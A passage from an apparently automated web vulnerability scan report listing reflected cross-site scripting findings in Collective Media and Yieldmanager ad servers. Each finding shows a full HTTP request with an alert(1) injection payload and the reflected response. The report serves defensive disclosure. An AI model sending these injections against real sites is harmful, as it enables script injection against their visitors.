ge="Javascript">CollectiveMedia.createAndAttachAd("q1-30207990841_1316221788","http://ad.doubleclick.net/adj/q1.bosherald/be_news;net=q1;u=,q1-30207990841_1316221788,12298b058f07061,none,;;cmw=nurl;sz=a7744'-alert(1)-'53b38ddfa3a;contx=none;dc=s;btg=?","a7744'-alert(1)-'53b38ddfa3a","",true);</scr'+'ipt>
...[SNIP]...

4.32. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/ent_fr

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d09a'-alert(1)-'33f55d64be5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj4d09a'-alert(1)-'33f55d64be5/q1.bosherald/ent_fr;sz=300x250;net=q1;ord=1813138297?;env=ifr;ord1=336916;cmpgurl=http%253A//bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7354
Date: Sat, 17 Sep 2011 01:20:15 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30105513189_1316222415","http://ad.doubleclick.net/adj4d09a'-alert(1)-'33f55d64be5/q1.bosherald/ent_fr;net=q1;u=,q1-30105513189_1316222415,12298b058f07061,ent,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=336916;contx=ent;dc=s;btg=;ord=1813138297??","300","250",true);</scr'+'ipt>
...[SNIP]...

4.33. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/ent_fr

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fae6'-alert(1)-'317c5c0c938 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosherald5fae6'-alert(1)-'317c5c0c938/ent_fr;sz=300x250;net=q1;ord=1813138297?;env=ifr;ord1=336916;cmpgurl=http%253A//bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7354
Date: Sat, 17 Sep 2011 01:20:19 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30323483817_1316222419","http://ad.doubleclick.net/adj/q1.bosherald5fae6'-alert(1)-'317c5c0c938/ent_fr;net=q1;u=,q1-30323483817_1316222419,12298b058f07061,ent,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=336916;contx=ent;dc=s;btg=;ord=1813138297??","300","250",true);</scr'+'ipt>
...[SNIP]...

4.34. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/ent_fr

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0fe9'-alert(1)-'e1c69b32c7b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosherald/ent_frb0fe9'-alert(1)-'e1c69b32c7b;sz=300x250;net=q1;ord=1813138297?;env=ifr;ord1=336916;cmpgurl=http%253A//bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7354
Date: Sat, 17 Sep 2011 01:20:21 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30419507438_1316222421","http://ad.doubleclick.net/adj/q1.bosherald/ent_frb0fe9'-alert(1)-'e1c69b32c7b;net=q1;u=,q1-30419507438_1316222421,12298b058f07061,ent,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=336916;contx=ent;dc=s;btg=;ord=1813138297??","300","250",true);</scr'+'ipt>
...[SNIP]...

4.35. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/ent_fr

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df0e3'-alert(1)-'44b07b60aae was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosherald/ent_fr;sz=df0e3'-alert(1)-'44b07b60aae HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7329
Date: Sat, 17 Sep 2011 01:20:07 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
age="Javascript">CollectiveMedia.createAndAttachAd("q1-30421855631_1316222407","http://ad.doubleclick.net/adj/q1.bosherald/ent_fr;net=q1;u=,q1-30421855631_1316222407,12298b058f07061,none,;;cmw=nurl;sz=df0e3'-alert(1)-'44b07b60aae;contx=none;dc=s;btg=?","df0e3'-alert(1)-'44b07b60aae","",true);</scr'+'ipt>
...[SNIP]...

4.36. http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/news

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8832c'-alert(1)-'b89805fab1f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj8832c'-alert(1)-'b89805fab1f/q1.bosherald/news;sz=728x90;net=q1;ord=354527464?;env=ifr;ord1=736181;cmpgurl=http%253A//www.bostonherald.com/news/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7353
Date: Sat, 17 Sep 2011 01:09:53 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30423216503_1316221793","http://ad.doubleclick.net/adj8832c'-alert(1)-'b89805fab1f/q1.bosherald/news;net=q1;u=,q1-30423216503_1316221793,12298b058f07061,polit,;;cmw=owl;sz=728x90;net=q1;env=ifr;ord1=736181;contx=polit;dc=s;btg=;ord=354527464??","728","90",true);</scr'+'ipt>
...[SNIP]...

4.37. http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbba4'-alert(1)-'e84b40c6dcb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosheralddbba4'-alert(1)-'e84b40c6dcb/news;sz=728x90;net=q1;ord=354527464?;env=ifr;ord1=736181;cmpgurl=http%253A//www.bostonherald.com/news/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7353
Date: Sat, 17 Sep 2011 01:09:54 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30101077229_1316221794","http://ad.doubleclick.net/adj/q1.bosheralddbba4'-alert(1)-'e84b40c6dcb/news;net=q1;u=,q1-30101077229_1316221794,12298b058f07061,polit,;;cmw=owl;sz=728x90;net=q1;env=ifr;ord1=736181;contx=polit;dc=s;btg=;ord=354527464??","728","90",true);</scr'+'ipt>
...[SNIP]...

4.38. http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/news

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f033d'-alert(1)-'85ce176899a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosherald/newsf033d'-alert(1)-'85ce176899a;sz=728x90;net=q1;ord=354527464?;env=ifr;ord1=736181;cmpgurl=http%253A//www.bostonherald.com/news/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7353
Date: Sat, 17 Sep 2011 01:09:54 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30223795082_1316221794","http://ad.doubleclick.net/adj/q1.bosherald/newsf033d'-alert(1)-'85ce176899a;net=q1;u=,q1-30223795082_1316221794,12298b058f07061,polit,;;cmw=owl;sz=728x90;net=q1;env=ifr;ord1=736181;contx=polit;dc=s;btg=;ord=354527464??","728","90",true);</scr'+'ipt>
...[SNIP]...

4.39. http://a.collective-media.net/cmadj/q1.bosherald/news [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/news

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48057'-alert(1)-'6d221538d81 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosherald/news;sz=48057'-alert(1)-'6d221538d81 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7327
Date: Sat, 17 Sep 2011 01:09:50 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
guage="Javascript">CollectiveMedia.createAndAttachAd("q1-30113229668_1316221790","http://ad.doubleclick.net/adj/q1.bosherald/news;net=q1;u=,q1-30113229668_1316221790,12298b058f07061,none,;;cmw=nurl;sz=48057'-alert(1)-'6d221538d81;contx=none;dc=s;btg=?","48057'-alert(1)-'6d221538d81","",true);</scr'+'ipt>
...[SNIP]...

4.40. http://ad.yieldmanager.com/imp [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72a06'%3balert(1)//5908bbe03b7 was submitted in the u parameter. This input was echoed as 72a06';alert(1)//5908bbe03b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?anmember=514&anprice=&Z=300x250&s=2298003&r=1&_salt=1576960469&u=http%3A%2F%2Fwww.tmz.com%2F&u=http://www.tmz.com/72a06'%3balert(1)//5908bbe03b7 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!$%00!!#RS!$XpC!1R*F!%`E+!!!!$!?5%!)H`@:!wVd.!%FMM!'lGU!'m1A~~~~~=4jht=6h5P~"; ih="b!!!!>!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1R*F!!!!#=4jht!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2/j6!!!!#=4qsr!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!3e]N!!!!#=4X$w!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; bh="b!!!#v!!-C,!!!!%=3`c_!!-G2!!!!%=5$1G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!$=57ob!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4u!!!!#=54Pi!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!x^1!!!!$=5,??!!y)?!!!!#=3*$x!##!)!!!!$=5#lv!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#6]*!!!!$=5#lv!#7wf!!!!#=51w'!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q/x!!!!#=5,(/!#Q]:!!!!#=4YXv!#Q_h!!!!$=3gb9!#QoI!!!!#=5,',!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#T<,!!!!$=5,??!#UD`!!!!$=3**U!#UL(!!!!#=5$1H!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!$=4X0s!#eCK!!!!$=4X0s!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#qq%!!!!#=4jf'!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#v5N!!!!$=5#lm!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$'.I!!!!$=5$1G!$'.K!!!!#=5$1G!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-`?!!!!#=4jeq!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!)=4_L-!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:jo!!!!%=5,9,!$<DI!!!!#=3G@^!$<Rh!!!!#=5$$X!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:54:43 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0341.rm.sp2
Set-Cookie: ih="b!!!!#!3e$^!!!!C=57qT"; path=/; expires=Mon, 16-Sep-2013 00:54:43 GMT
Set-Cookie: vuday1=8ac=%N5HGH?9-O6; path=/; expires=Sun, 18-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!#!$7w.!!%f!!%d(@!3e$^!'/%f!!mT+~)I#RI!ZmB)!(XE3!(Gex~~~~~~=57qT=9K[_!!.vL"; path=/; expires=Mon, 16-Sep-2013 00:54:43 GMT
